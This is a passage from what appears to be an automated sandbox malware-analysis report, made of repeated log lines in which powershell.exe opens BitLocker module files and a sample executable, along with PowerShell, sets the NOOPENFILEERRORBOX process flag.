                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\3XtEci4Mmo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
